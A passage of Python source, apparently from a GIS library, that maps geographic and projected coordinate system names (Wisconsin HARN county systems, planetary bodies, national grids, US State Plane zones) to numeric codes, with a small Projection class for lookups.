'GCS_NAD_1983_HARN_Adj_WI_Dane': 104812, 'GCS_NAD_1983_HARN_Adj_WI_Dodge': 104813, 'GCS_NAD_1983_HARN_Adj_WI_Door': 104814, 'GCS_NAD_1983_HARN_Adj_WI_Douglas': 104815, 'GCS_NAD_1983_HARN_Adj_WI_Dunn': 104816, 'GCS_NAD_1983_HARN_Adj_WI_EauClaire': 104817, 'GCS_NAD_1983_HARN_Adj_WI_Florence': 104818, 'GCS_NAD_1983_HARN_Adj_WI_FondduLac': 104819, 'GCS_NAD_1983_HARN_Adj_WI_Forest': 104820, 'GCS_NAD_1983_HARN_Adj_WI_Grant': 104821, 'GCS_NAD_1983_HARN_Adj_WI_Green': 104822, 'GCS_NAD_1983_HARN_Adj_WI_GreenLake': 104823, 'GCS_NAD_1983_HARN_Adj_WI_Iowa': 104824, 'GCS_NAD_1983_HARN_Adj_WI_Iron': 104825, 'GCS_NAD_1983_HARN_Adj_WI_Jackson': 104826, 'GCS_NAD_1983_HARN_Adj_WI_Jefferson': 104827, 'GCS_NAD_1983_HARN_Adj_WI_Juneau': 104828, 'GCS_NAD_1983_HARN_Adj_WI_Kenosha': 104829, 'GCS_NAD_1983_HARN_Adj_WI_Kewaunee': 104830, 'GCS_NAD_1983_HARN_Adj_WI_LaCrosse': 104831, 'GCS_NAD_1983_HARN_Adj_WI_Lafayette': 104832, 'GCS_NAD_1983_HARN_Adj_WI_Langlade': 104833, 'GCS_NAD_1983_HARN_Adj_WI_Lincoln': 104834, 'GCS_NAD_1983_HARN_Adj_WI_Manitowoc': 104835, 'GCS_NAD_1983_HARN_Adj_WI_Marathon': 104836, 'GCS_NAD_1983_HARN_Adj_WI_Marinette': 104837, 'GCS_NAD_1983_HARN_Adj_WI_Marquette': 104838, 'GCS_NAD_1983_HARN_Adj_WI_Menominee': 104839, 'GCS_NAD_1983_HARN_Adj_WI_Milwaukee': 104840, 'GCS_NAD_1983_HARN_Adj_WI_Monroe': 104841, 'GCS_NAD_1983_HARN_Adj_WI_Oconto': 104842, 'GCS_NAD_1983_HARN_Adj_WI_Oneida': 104843, 'GCS_NAD_1983_HARN_Adj_WI_Outagamie': 104844, 'GCS_NAD_1983_HARN_Adj_WI_Ozaukee': 104845, 'GCS_NAD_1983_HARN_Adj_WI_Pepin': 104846, 'GCS_NAD_1983_HARN_Adj_WI_Pierce': 104847, 'GCS_NAD_1983_HARN_Adj_WI_Polk': 104848, 'GCS_NAD_1983_HARN_Adj_WI_Portage': 104849, 'GCS_NAD_1983_HARN_Adj_WI_Price': 104850, 'GCS_NAD_1983_HARN_Adj_WI_Racine': 104851, 'GCS_NAD_1983_HARN_Adj_WI_Richland': 104852, 'GCS_NAD_1983_HARN_Adj_WI_Rock': 104853, 'GCS_NAD_1983_HARN_Adj_WI_Rusk': 104854, 'GCS_NAD_1983_HARN_Adj_WI_StCroix': 104855, 'GCS_NAD_1983_HARN_Adj_WI_Sauk': 104856, 'GCS_NAD_1983_HARN_Adj_WI_Sawyer': 104857, 'GCS_NAD_1983_HARN_Adj_WI_Shawano': 104858, 'GCS_NAD_1983_HARN_Adj_WI_Sheboygan': 104859, 'GCS_NAD_1983_HARN_Adj_WI_Taylor': 104860, 'GCS_NAD_1983_HARN_Adj_WI_Trempealeau': 104861, 'GCS_NAD_1983_HARN_Adj_WI_Vernon': 104862, 'GCS_NAD_1983_HARN_Adj_WI_Vilas': 104863, 'GCS_NAD_1983_HARN_Adj_WI_Walworth': 104864, 'GCS_NAD_1983_HARN_Adj_WI_Washburn': 104865, 'GCS_NAD_1983_HARN_Adj_WI_Washington': 104866, 'GCS_NAD_1983_HARN_Adj_WI_Waukesha': 104867, 'GCS_NAD_1983_HARN_Adj_WI_Waupaca': 104868, 'GCS_NAD_1983_HARN_Adj_WI_Waushara': 104869, 'GCS_NAD_1983_HARN_Adj_WI_Winnebago': 104870, 'GCS_NAD_1983_HARN_Adj_WI_Wood': 104871, 'GCS_Mercury_2000': 104900, 'GCS_Venus_1985': 104901, 'GCS_Venus_2000': 104902, 'GCS_Moon_2000': 104903, 'GCS_Mars_1979': 104904, 'GCS_Mars_2000': 104905, 'GCS_Deimos_2000': 104906, 'GCS_Phobos_2000': 104907, 'GCS_Jupiter_2000': 104908, 'GCS_Adrastea_2000': 104909, 'GCS_Amalthea_2000': 104910, 'GCS_Ananke_2000': 104911, 'GCS_Callisto_2000': 104912, 'GCS_Carme_2000': 104913, 'GCS_Elara_2000': 104914, 'GCS_Europa_2000': 104915, 'GCS_Ganymede_2000': 104916, 'GCS_Himalia_2000': 104917, 'GCS_Io_2000': 104918, 'GCS_Leda_2000': 104919, 'GCS_Lysithea_2000': 104920, 'GCS_Metis_2000': 104921, 'GCS_Pasiphae_2000': 104922, 'GCS_Sinope_2000': 104923, 'GCS_Thebe_2000': 104924, 'GCS_Saturn_2000': 104925, 'GCS_Atlas_2000': 104926, 'GCS_Calypso_2000': 104927, 'GCS_Dione_2000': 104928, 'GCS_Enceladus_2000': 104929, 'GCS_Epimetheus_2000': 104930, 'GCS_Helene_2000': 104931, 'GCS_Hyperion_2000': 104932, 'GCS_Iapetus_2000': 104933, 'GCS_Janus_2000': 104934, 'GCS_Mimas_2000': 104935, 'GCS_Pan_2000': 104936, 'GCS_Pandora_2000': 104937, 'GCS_Phoebe_2000': 104938, 'GCS_Prometheus_2000': 104939, 'GCS_Rhea_2000': 104940, 'GCS_Telesto_2000': 104941, 'GCS_Tethys_2000': 104942, 'GCS_Titan_2000': 104943, 'GCS_Uranus_2000': 104944, 'GCS_Ariel_2000': 104945, 'GCS_Belinda_2000': 104946, 'GCS_Bianca_2000': 104947, 'GCS_Cordelia_2000': 104948, 'GCS_Cressida_2000': 104949, 'GCS_Desdemona_2000': 104950, 'GCS_Juliet_2000': 104951, 'GCS_Miranda_2000': 104952, 'GCS_Oberon_2000': 104953, 'GCS_Ophelia_2000': 104954, 'GCS_Portia_2000': 104955, 'GCS_Puck_2000': 104956, 'GCS_Rosalind_2000': 104957, 'GCS_Titania_2000': 104958, 'GCS_Umbriel_2000': 104959, 'GCS_Neptune_2000': 104960, 'GCS_Despina_2000': 104961, 'GCS_Galatea_2000': 104962, 'GCS_Larissa_2000': 104963, 'GCS_Naiad_2000': 104964, 'GCS_Nereid_2000': 104965, 'GCS_Proteus_2000': 104966, 'GCS_Thalassa_2000': 104967, 'GCS_Triton_2000': 104968, 'GCS_Pluto_2000': 104969, 'GCS_Charon_2000': 104970 } geographic = geographic() projected = projected()
import os class Projection(object): def __init__(self): self._name_mapping = {} for key, val in self._projections.items(): self._name_mapping[int(val)] = key setattr(self, key.replace('-', '_'), val) def __getitem__(self, index): return self._name_mapping[int(index)] def __contains__(self, index): return index in self._name_mapping class projected(Projection): _projections = { 'Anguilla_1957_British_West_Indies_Grid': 2000, 'Antigua_1943_British_West_Indies_Grid': 2001, 'Dominica_1945_British_West_Indies_Grid': 2002, 'Grenada_1953_British_West_Indies_Grid': 2003, 'Montserrat_1958_British_West_Indies_Grid': 2004, 'St_Kitts_1955_British_West_Indies_Grid': 2005, 'St_Lucia_1955_British_West_Indies_Grid': 2006, 'St_Vincent_1945_British_West_Indies_Grid': 2007, 'NAD_1927_CGQ77_MTM_2_SCoPQ': 2008, 'NAD_1927_CGQ77_MTM_3_SCoPQ': 2009, 'NAD_1927_CGQ77_MTM_4_SCoPQ': 2010, 'NAD_1927_CGQ77_MTM_5_SCoPQ': 2011, 'NAD_1927_CGQ77_MTM_6_SCoPQ': 2012, 'NAD_1927_CGQ77_MTM_7_SCoPQ': 2013, 'NAD_1927_CGQ77_MTM_8_SCoPQ': 2014, 'NAD_1927_CGQ77_MTM_9_SCoPQ': 2015, 'NAD_1927_CGQ77_MTM_10_SCoPQ': 2016, 'NAD_1927_DEF_1976_MTM_8': 2017, 'NAD_1927_DEF_1976_MTM_9': 2018, 'NAD_1927_DEF_1976_MTM_10': 2019, 'NAD_1927_DEF_1976_MTM_11': 2020, 'NAD_1927_DEF_1976_MTM_12': 2021, 'NAD_1927_DEF_1976_MTM_13': 2022, 'NAD_1927_DEF_1976_MTM_14': 2023, 'NAD_1927_DEF_1976_MTM_15': 2024, 'NAD_1927_DEF_1976_MTM_16': 2025, 'NAD_1927_DEF_1976_MTM_17': 2026, 'NAD_1927_DEF_1976_UTM_Zone_15N': 2027, 'NAD_1927_DEF_1976_UTM_Zone_16N': 2028, 'NAD_1927_DEF_1976_UTM_Zone_17N': 2029, 'NAD_1927_DEF_1976_UTM_Zone_18N': 2030, 'NAD_1927_CGQ77_UTM_Zone_17N': 2031, 'NAD_1927_CGQ77_UTM_Zone_18N': 2032, 'NAD_1927_CGQ77_UTM_Zone_19N': 2033, 'NAD_1927_CGQ77_UTM_Zone_20N': 2034, 'NAD_1927_CGQ77_UTM_Zone_21N': 2035, 'NAD_1983_CSRS_New_Brunswick_Stereographic': 2036, 'NAD_1983_CSRS_UTM_Zone_19N': 2037, 'NAD_1983_CSRS_UTM_Zone_20N': 2038, 'Israel_TM_Grid': 2039, 'Locodjo_1965_UTM_Zone_30N': 2040, 'Abidjan_1987_UTM_Zone_30N': 2041, 'Locodjo_1965_UTM_Zone_29N': 2042, 'Abidjan_1987_UTM_Zone_29N': 2043, 'Hanoi_1972_GK_Zone_18': 2044, 'Hanoi_1972_GK_Zone_19': 2045, 'CH1903+_LV95': 2056, 'Rassadiran_Nakhl_e_Taqi': 2057, 'ED_1950_ED77_UTM_Zone_38N': 2058, 'ED_1950_ED77_UTM_Zone_39N': 2059, 'ED_1950_ED77_UTM_Zone_40N': 2060, 'ED_1950_ED77_UTM_Zone_41N': 2061, 'Madrid_1870_Madrid_Spain': 2062, 'Dabola_1981_UTM_Zone_28N': 2063, 'Dabola_1981_UTM_Zone_29N': 2064, 'S-JTSK_Ferro_Krovak': 2065, 'Mount_Dillon_Tobago_Grid': 2066, 'Naparima_1955_UTM_Zone_20N': 2067, 'ELD_1979_Libya_5': 2068, 'ELD_1979_Libya_6': 2069, 'ELD_1979_Libya_7': 2070, 'ELD_1979_Libya_8': 2071, 'ELD_1979_Libya_9': 2072, 'ELD_1979_Libya_10': 2073, 'ELD_1979_Libya_11': 2074, 'ELD_1979_Libya_12': 2075, 'ELD_1979_Libya_13': 2076, 'ELD_1979_UTM_Zone_32N': 2077, 'ELD_1979_UTM_Zone_33N': 2078, 'ELD_1979_UTM_Zone_34N': 2079, 'ELD_1979_UTM_Zone_35N': 2080, 'Chos_Malal_1914_Argentina_2': 2081, 'Pampa_del_Castillo_Argentina_2': 2082, 'Hito_XVIII_1963_Argentina_2': 2083, 'Hito_XVIII_1963_UTM_19S': 2084, 'NAD_1927_Cuba_Norte': 2085, 'NAD_1927_Cuba_Sur': 2086, 'ELD_1979_TM_12_NE': 2087, 'Carthage_TM_11_NE': 2088, 'Yemen_NGN_1996_UTM_Zone_38N': 2089, 'Yemen_NGN_1996_UTM_Zone_39N': 2090, 'South_Yemen_GK_Zone_8': 2091, 'South_Yemen_GK_Zone_9': 2092, 'Hanoi_1972_GK_106_NE': 2093, 'WGS_1972_BE_TM_106_NE': 2094, 'Bissau_UTM_Zone_28N': 2095, 'Korean_1985_Korea_East_Belt': 2096, 'Korean_1985_Korea_Central_Belt': 2097, 'Korean_1985_Korea_West_Belt': 2098, 'Qatar_1948_Qatar_Grid': 2099, 'Greek_Grid': 2100, 'Lake_Maracaibo_Grid_M1': 2101, 'Lake_Maracaibo_Grid': 2102, 'Lake_Maracaibo_Grid_M3': 2103, 'Lake_Maracaibo_La_Rosa_Grid': 2104, 'NZGD_2000_Mount_Eden_Circuit': 2105, 'NZGD_2000_Bay_of_Plenty_Circuit': 2106, 'NZGD_2000_Poverty_Bay_Circuit': 2107, 'NZGD_2000_Hawkes_Bay_Circuit': 2108, 'NZGD_2000_Taranaki_Circuit': 2109, 'NZGD_2000_Tuhirangi_Circuit': 2110, 'NZGD_2000_Wanganui_Circuit': 2111, 'NZGD_2000_Wairarapa_Circuit': 2112, 'NZGD_2000_Wellington_Circuit': 2113, 'NZGD_2000_Collingwood_Circuit': 2114, 'NZGD_2000_Nelson_Circuit': 2115, 'NZGD_2000_Karamea_Circuit': 2116, 'NZGD_2000_Buller_Circuit': 2117, 'NZGD_2000_Grey_Circuit': 2118, 'NZGD_2000_Amuri_Circuit': 2119, 'NZGD_2000_Marlborough_Circuit': 2120, 'NZGD_2000_Hokitika_Circuit': 2121, 'NZGD_2000_Okarito_Circuit': 2122, 'NZGD_2000_Jacksons_Bay_Circuit': 2123, 'NZGD_2000_Mount_Pleasant_Circuit': 2124, 'NZGD_2000_Gawler_Circuit': 2125, 'NZGD_2000_Timaru_Circuit': 2126, 'NZGD_2000_Lindis_Peak_Circuit': 2127, 'NZGD_2000_Mount_Nicholas_Circuit': 2128, 'NZGD_2000_Mount_York_Circuit': 2129, 'NZGD_2000_Observation_Point_Circuit': 2130, 'NZGD_2000_North_Taieri_Circuit': 2131, 'NZGD_2000_Bluff_Circuit': 2132, 'NZGD_2000_UTM_Zone_58S': 2133, 'NZGD_2000_UTM_Zone_59S': 2134, 'NZGD_2000_UTM_Zone_60S': 2135, 'Accra_Ghana_Grid': 2136, 'Accra_TM_1_NW': 2137, 'NAD_1927_CGQ77_Quebec_Lambert': 2138, 'NAD_1983_CSRS_MTM_2_SCoPQ': 2139, 'NAD_1983_CSRS_MTM_3': 2140, 'NAD_1983_CSRS_MTM_4': 2141, 'NAD_1983_CSRS_MTM_5': 2142, 'NAD_1983_CSRS_MTM_6': 2143, 'NAD_1983_CSRS_MTM_7': 2144, 'NAD_1983_CSRS_MTM_8': 2145, 'NAD_1983_CSRS_MTM_9': 2146, 'NAD_1983_CSRS_MTM_10': 2147, 'NAD_1983_CSRS_UTM_Zone_21N': 2148, 'NAD_1983_CSRS_UTM_Zone_18N': 2149, 'NAD_1983_CSRS_UTM_Zone_17N': 2150, 'NAD_1983_CSRS_UTM_Zone_13N': 2151, 'NAD_1983_CSRS_UTM_Zone_12N': 2152, 'NAD_1983_CSRS_UTM_Zone_11N': 2153, 'RGF_1993_Lambert_93': 2154, 'Samoa_1962_Samoa_Lambert': 2155, 'IRENET95_Irish_Transverse_Mercator': 2157, 'IRENET95_UTM_Zone_29N': 2158, 'Sierra_Leone_1924_New_Colony_Grid': 2159, 'Sierra_Leone_1924_New_War_Office_Grid': 2160, 'Sierra_Leone_1968_UTM_Zone_28N': 2161, 'Sierra_Leone_1968_UTM_Zone_29N': 2162, 'US_National_Atlas_Equal_Area': 2163, 'Locodjo_1965_TM_5_NW': 2164, 'Abidjan_1987_TM_5_NW': 2165, 'Pulkovo_1942_Adj_1983_3_Degree_GK_Zone_3': 2166, 'Pulkovo_1942_Adj_1983_3_Degree_GK_Zone_4': 2167, 'Pulkovo_1942_Adj_1983_3_Degree_GK_Zone_5': 2168, 'Luxembourg_1930_Gauss': 2169, 'MGI_Slovenia_Grid': 2170, 'Pulkovo_1942_Adj_1958_Poland_Zone_II': 2172, 'Pulkovo_1942_Adj_1958_Poland_Zone_III': 2173, 'Pulkovo_1942_Adj_1958_Poland_Zone_IV': 2174, 'Pulkovo_1942_Adj_1958_Poland_Zone_V': 2175, 'ETRS_1989_Poland_CS2000_Zone_5': 2176, 'ETRS_1989_Poland_CS2000_Zone_6': 2177, 'ETRS_1989_Poland_CS2000_Zone_7': 2178, 'ETRS_1989_Poland_CS2000_Zone_8': 2179, 'ETRS_1989_Poland_CS92': 2180, 'ED_1950_Turkey_9': 2181, 'ED_1950_Turkey_10': 2182, 'ED_1950_Turkey_11': 2183, 'ED_1950_Turkey_12': 2184, 'ED_1950_Turkey_13': 2185, 'ED_1950_Turkey_14': 2186, 'ED_1950_Turkey_15': 2187, 'Azores_Occidental_1939_UTM_Zone_25N': 2188, 'Azores_Central_1948_UTM_Zone_26N': 2189, 'Azores_Oriental_1940_UTM_Zone_26N': 2190, 'ED_1950_France_EuroLambert': 2192, 'NZGD_2000_New_Zealand_Transverse_Mercator': 2193, 'NAD_1983_HARN_UTM_Zone_2S': 2195, 'ETRS_1989_Kp2000_Jutland': 2196, 'ETRS_1989_Kp2000_Zealand': 2197, 'ETRS_1989_Kp2000_Bornholm': 2198, 'ATS_1977_New_Brunswick_Stereographic': 2200, 'REGVEN_UTM_Zone_18N': 2201, 'REGVEN_UTM_Zone_19N': 2202, 'REGVEN_UTM_Zone_20N': 2203, 'NAD_1927_StatePlane_Tennessee_FIPS_4100': 2204, 'NAD_1983_StatePlane_Kentucky_North_FIPS_1601': 2205, 'ED_1950_3_Degree_GK_Zone_9': 2206, 'ED_1950_3_Degree_GK_Zone_10': 2207, 'ED_1950_3_Degree_GK_Zone_11': 2208, 'ED_1950_3_Degree_GK_Zone_12': 2209, 'ED_1950_3_Degree_GK_Zone_13': 2210, 'ED_1950_3_Degree_GK_Zone_14': 2211, 'ED_1950_3_Degree_GK_Zone_15': 2212, 'ETRS_1989_TM_30_NE': 2213, 'Douala_1948_AEF_West': 2214, 'Manoca_1962_UTM_Zone_32N': 2215, 'Qornoq_1927_UTM_Zone_22N': 2216, 'Qornoq_1927_UTM_Zone_23N': 2217, 'ATS_1977_UTM_Zone_19N': 2219, 'ATS_1977_UTM_Zone_20N': 2220, 'NAD_1983_StatePlane_Arizona_East_FIPS_0201_Feet_Intl': 2222, 'NAD_1983_StatePlane_Arizona_Central_FIPS_0202_Feet_Intl': 2223, 'NAD_1983_StatePlane_Arizona_West_FIPS_0203_Feet_Intl': 2224, 'NAD_1983_StatePlane_California_I_FIPS_0401_Feet': 2225, 'NAD_1983_StatePlane_California_II_FIPS_0402_Feet': 2226, 'NAD_1983_StatePlane_California_III_FIPS_0403_Feet': 2227, 'NAD_1983_StatePlane_California_IV_FIPS_0404_Feet': 2228, 'NAD_1983_StatePlane_California_V_FIPS_0405_Feet': 2229, 'NAD_1983_StatePlane_California_VI_FIPS_0406_Feet': 2230, 'NAD_1983_StatePlane_Colorado_North_FIPS_0501_Feet': 2231, 'NAD_1983_StatePlane_Colorado_Central_FIPS_0502_Feet': 2232, 'NAD_1983_StatePlane_Colorado_South_FIPS_0503_Feet': 2233, 'NAD_1983_StatePlane_Connecticut_FIPS_0600_Feet': 2234, 'NAD_1983_StatePlane_Delaware_FIPS_0700_Feet': 2235, 'NAD_1983_StatePlane_Florida_East_FIPS_0901_Feet': 2236, 'NAD_1983_StatePlane_Florida_West_FIPS_0902_Feet': 2237, 'NAD_1983_StatePlane_Florida_North_FIPS_0903_Feet': 2238, 'NAD_1983_StatePlane_Georgia_East_FIPS_1001_Feet': 2239, 'NAD_1983_StatePlane_Georgia_West_FIPS_1002_Feet': 2240, 'NAD_1983_StatePlane_Idaho_East_FIPS_1101_Feet': 2241, 'NAD_1983_StatePlane_Idaho_Central_FIPS_1102_Feet': 2242, 'NAD_1983_StatePlane_Idaho_West_FIPS_1103_Feet': 2243, 'NAD_1983_StatePlane_Indiana_East_FIPS_1301_Feet': 2244, 'NAD_1983_StatePlane_Indiana_West_FIPS_1302_Feet': 2245, 'NAD_1983_StatePlane_Kentucky_North_FIPS_1601_Feet': 2246, 'NAD_1983_StatePlane_Kentucky_South_FIPS_1602_Feet': 2247, 'NAD_1983_StatePlane_Maryland_FIPS_1900_Feet': 2248, 'NAD_1983_StatePlane_Massachusetts_Mainland_FIPS_2001_Feet': 2249, 'NAD_1983_StatePlane_Massachusetts_Island_FIPS_2002_Feet': 2250, 'NAD_1983_StatePlane_Michigan_North_FIPS_2111_Feet_Intl': 2251, 'NAD_1983_StatePlane_Michigan_Central_FIPS_2112_Feet_Intl': 2252, 'NAD_1983_StatePlane_Michigan_South_FIPS_2113_Feet_Intl': 2253, 'NAD_1983_StatePlane_Mississippi_East_FIPS_2301_Feet': 2254, 'NAD_1983_StatePlane_Mississippi_West_FIPS_2302_Feet': 2255, 'NAD_1983_StatePlane_Montana_FIPS_2500_Feet_Intl': 2256, 'NAD_1983_StatePlane_New_Mexico_East_FIPS_3001_Feet': 2257, 'NAD_1983_StatePlane_New_Mexico_Central_FIPS_3002_Feet': 2258, 'NAD_1983_StatePlane_New_Mexico_West_FIPS_3003_Feet': 2259, 'NAD_1983_StatePlane_New_York_East_FIPS_3101_Feet': 2260, 'NAD_1983_StatePlane_New_York_Central_FIPS_3102_Feet': 2261, 'NAD_1983_StatePlane_New_York_West_FIPS_3103_Feet': 2262, 'NAD_1983_StatePlane_New_York_Long_Island_FIPS_3104_Feet': 2263, 'NAD_1983_StatePlane_North_Carolina_FIPS_3200_Feet': 2264, 'NAD_1983_StatePlane_North_Dakota_North_FIPS_3301_Feet_Intl': 2265, 'NAD_1983_StatePlane_North_Dakota_South_FIPS_3302_Feet_Intl': 2266, 'NAD_1983_StatePlane_Oklahoma_North_FIPS_3501_Feet': 2267, 'NAD_1983_StatePlane_Oklahoma_South_FIPS_3502_Feet': 2268, 'NAD_1983_StatePlane_Oregon_North_FIPS_3601_Feet_Intl': 2269, 'NAD_1983_StatePlane_Oregon_South_FIPS_3602_Feet_Intl': 2270, 'NAD_1983_StatePlane_Pennsylvania_North_FIPS_3701_Feet': 2271, 'NAD_1983_StatePlane_Pennsylvania_South_FIPS_3702_Feet': 2272, 'NAD_1983_StatePlane_South_Carolina_FIPS_3900_Feet_Intl': 2273, 'NAD_1983_StatePlane_Tennessee_FIPS_4100_Feet': 2274, 'NAD_1983_StatePlane_Texas_North_FIPS_4201_Feet': 2275, 'NAD_1983_StatePlane_Texas_North_Central_FIPS_4202_Feet': 2276, 'NAD_1983_StatePlane_Texas_Central_FIPS_4203_Feet': 2277, 'NAD_1983_StatePlane_Texas_South_Central_FIPS_4204_Feet': 2278, 'NAD_1983_StatePlane_Texas_South_FIPS_4205_Feet': 2279, 'NAD_1983_StatePlane_Utah_North_FIPS_4301_Feet_Intl': 2280, 'NAD_1983_StatePlane_Utah_Central_FIPS_4302_Feet_Intl': 2281, 'NAD_1983_StatePlane_Utah_South_FIPS_4303_Feet_Intl': 2282, 'NAD_1983_StatePlane_Virginia_North_FIPS_4501_Feet': 2283, 'NAD_1983_StatePlane_Virginia_South_FIPS_4502_Feet': 2284, 'NAD_1983_StatePlane_Washington_North_FIPS_4601_Feet': 2285, 'NAD_1983_StatePlane_Washington_South_FIPS_4602_Feet': 2286, 'NAD_1983_StatePlane_Wisconsin_North_FIPS_4801_Feet': 2287, 'NAD_1983_StatePlane_Wisconsin_Central_FIPS_4802_Feet': 2288, 'NAD_1983_StatePlane_Wisconsin_South_FIPS_4803_Feet': 2289, 'Prince_Edward_Island_Stereographic': 2290, 'NAD_1983_CSRS_Prince_Edward_Island': 2291, 'NAD_1983_CSRS_Prince_Edward_Island': 2292, 'ATS_1977_MTM_4_Nova_Scotia': 2294, 'ATS_1977_MTM_5_Nova_Scotia': 2295, 'Batavia_TM_109_SE': 2308, 'WGS_1984_TM_116_SE': 2309, 'WGS_1984_TM_132_SE': 2310, 'WGS_1984_TM_6_NE': 2311, 'Garoua_UTM_Zone_33N': 2312, 'Kousseri_UTM_Zone_33N': 2313, 'Trinidad_1903_Trinidad_Grid_Feet_Clarke': 2314, 'Campo_Inchauspe_UTM_19S': 2315, 'Campo_Inchauspe_UTM_20S': 2316, 'PSAD_1956_ICN_Regional': 2317, 'Ain_el_Abd_Aramco_Lambert': 2318, 'ED_1950_TM27': 2319, 'ED_1950_TM30': 2320, 'ED_1950_TM33': 2321, 'ED_1950_TM36': 2322, 'ED_1950_TM39': 2323, 'ED_1950_TM42': 2324, 'ED_1950_TM45': 2325, 'Hong_Kong_1980_Grid': 2326, 'Xian_1980_GK_Zone_13': 2327, 'Xian_1980_GK_Zone_14': 2328, 'Xian_1980_GK_Zone_15': 2329, 'Xian_1980_GK_Zone_16': 2330, 'Xian_1980_GK_Zone_17': 2331, 'Xian_1980_GK_Zone_18': 2332, 'Xian_1980_GK_Zone_19': 2333, 'Xian_1980_GK_Zone_20': 2334, 'Xian_1980_GK_Zone_21': 2335, 'Xian_1980_GK_Zone_22': 2336, 'Xian_1980_GK_Zone_23': 2337, 'Xian_1980_GK_CM_75E': 2338, 'Xian_1980_GK_CM_81E': 2339, 'Xian_1980_GK_CM_87E': 2340, 'Xian_1980_GK_CM_93E': 2341, 'Xian_1980_GK_CM_99E': 2342, 'Xian_1980_GK_CM_105E': 2343, 'Xian_1980_GK_CM_111E': 2344, 'Xian_1980_GK_CM_117E': 2345, 'Xian_1980_GK_CM_123E': 2346, 'Xian_1980_GK_CM_129E': 2347, 'Xian_1980_GK_CM_135E': 2348, 'Xian_1980_3_Degree_GK_Zone_25': 2349, 'Xian_1980_3_Degree_GK_Zone_26': 2350, 'Xian_1980_3_Degree_GK_Zone_27': 2351, 'Xian_1980_3_Degree_GK_Zone_28': 2352, 'Xian_1980_3_Degree_GK_Zone_29': 2353, 'Xian_1980_3_Degree_GK_Zone_30': 2354, 'Xian_1980_3_Degree_GK_Zone_31': 2355, 'Xian_1980_3_Degree_GK_Zone_32': 2356, 'Xian_1980_3_Degree_GK_Zone_33': 2357, 'Xian_1980_3_Degree_GK_Zone_34': 2358, 'Xian_1980_3_Degree_GK_Zone_35': 2359, 'Xian_1980_3_Degree_GK_Zone_36': 2360, 'Xian_1980_3_Degree_GK_Zone_37': 2361, 'Xian_1980_3_Degree_GK_Zone_38': 2362, 'Xian_1980_3_Degree_GK_Zone_39': 2363, 'Xian_1980_3_Degree_GK_Zone_40': 2364, 'Xian_1980_3_Degree_GK_Zone_41': 2365, 'Xian_1980_3_Degree_GK_Zone_42': 2366, 'Xian_1980_3_Degree_GK_Zone_43': 2367, 'Xian_1980_3_Degree_GK_Zone_44': 2368, 'Xian_1980_3_Degree_GK_Zone_45': 2369, 'Xian_1980_3_Degree_GK_CM_75E': 2370, 'Xian_1980_3_Degree_GK_CM_78E': 2371, 'Xian_1980_3_Degree_GK_CM_81E': 2372, 'Xian_1980_3_Degree_GK_CM_84E': 2373, 'Xian_1980_3_Degree_GK_CM_87E': 2374, 'Xian_1980_3_Degree_GK_CM_90E': 2375, 'Xian_1980_3_Degree_GK_CM_93E': 2376, 'Xian_1980_3_Degree_GK_CM_96E': 2377, 'Xian_1980_3_Degree_GK_CM_99E': 2378, 'Xian_1980_3_Degree_GK_CM_102E': 2379, 'Xian_1980_3_Degree_GK_CM_105E': 2380, 'Xian_1980_3_Degree_GK_CM_108E': 2381, 'Xian_1980_3_Degree_GK_CM_111E': 2382, 'Xian_1980_3_Degree_GK_CM_114E': 2383, 'Xian_1980_3_Degree_GK_CM_117E': 2384, 'Xian_1980_3_Degree_GK_CM_120E': 2385, 'Xian_1980_3_Degree_GK_CM_123E': 2386, 'Xian_1980_3_Degree_GK_CM_126E': 2387, 'Xian_1980_3_Degree_GK_CM_129E': 2388, 'Xian_1980_3_Degree_GK_CM_132E': 2389, 'Xian_1980_3_Degree_GK_CM_135E': 2390, 'Finland_Zone_1': 2391, 'Finland_Zone_2': 2392, 'Finland_Zone_3': 2393, 'Finland_Zone_4': 2394, 'South_Yemen_GK_Zone_8': 2395, 'South_Yemen_GK_Zone_9': 2396, 'Pulkovo_1942_Adj_1983_3_Degree_GK_Zone_3': 2397, 'Pulkovo_1942_Adj_1983_3_Degree_GK_Zone_4': 2398, 'Pulkovo_1942_Adj_1983_3_Degree_GK_Zone_5': 2399, 'RT90_25_gon_W': 2400, 'Beijing_1954_3_Degree_GK_Zone_25': 2401, 'Beijing_1954_3_Degree_GK_Zone_26': 2402, 'Beijing_1954_3_Degree_GK_Zone_27': 2403, 'Beijing_1954_3_Degree_GK_Zone_28': 2404, 'Beijing_1954_3_Degree_GK_Zone_29': 2405, 'Beijing_1954_3_Degree_GK_Zone_30': 2406, 'Beijing_1954_3_Degree_GK_Zone_31': 2407, 'Beijing_1954_3_Degree_GK_Zone_32': 2408, 'Beijing_1954_3_Degree_GK_Zone_33': 2409, 'Beijing_1954_3_Degree_GK_Zone_34': 2410, 'Beijing_1954_3_Degree_GK_Zone_35': 2411, 'Beijing_1954_3_Degree_GK_Zone_36': 2412, 'Beijing_1954_3_Degree_GK_Zone_37': 2413, 'Beijing_1954_3_Degree_GK_Zone_38': 2414, 'Beijing_1954_3_Degree_GK_Zone_39': 2415, 'Beijing_1954_3_Degree_GK_Zone_40': 2416, 'Beijing_1954_3_Degree_GK_Zone_41': 2417, 'Beijing_1954_3_Degree_GK_Zone_42': 2418, 'Beijing_1954_3_Degree_GK_Zone_43': 2419, 'Beijing_1954_3_Degree_GK_Zone_44': 2420, 'Beijing_1954_3_Degree_GK_Zone_45': 2421, 'Beijing_1954_3_Degree_GK_CM_75E': 2422, 'Beijing_1954_3_Degree_GK_CM_78E': 2423, 'Beijing_1954_3_Degree_GK_CM_81E': 2424, 'Beijing_1954_3_Degree_GK_CM_84E': 2425, 'Beijing_1954_3_Degree_GK_CM_87E': 2426, 'Beijing_1954_3_Degree_GK_CM_90E': 2427, 'Beijing_1954_3_Degree_GK_CM_93E': 2428, 'Beijing_1954_3_Degree_GK_CM_96E': 2429, 'Beijing_1954_3_Degree_GK_CM_99E': 2430, 'Beijing_1954_3_Degree_GK_CM_102E': 2431, 'Beijing_1954_3_Degree_GK_CM_105E': 2432, 'Beijing_1954_3_Degree_GK_CM_108E': 2433, 'Beijing_1954_3_Degree_GK_CM_111E': 2434, 'Beijing_1954_3_Degree_GK_CM_114E': 2435, 'Beijing_1954_3_Degree_GK_CM_117E': 2436, 'Beijing_1954_3_Degree_GK_CM_120E': 2437, 'Beijing_1954_3_Degree_GK_CM_123E': 2438, 'Beijing_1954_3_Degree_GK_CM_126E': 2439, 'Beijing_1954_3_Degree_GK_CM_129E': 2440, 'Beijing_1954_3_Degree_GK_CM_132E': 2441, 'Beijing_1954_3_Degree_GK_CM_135E': 2442, 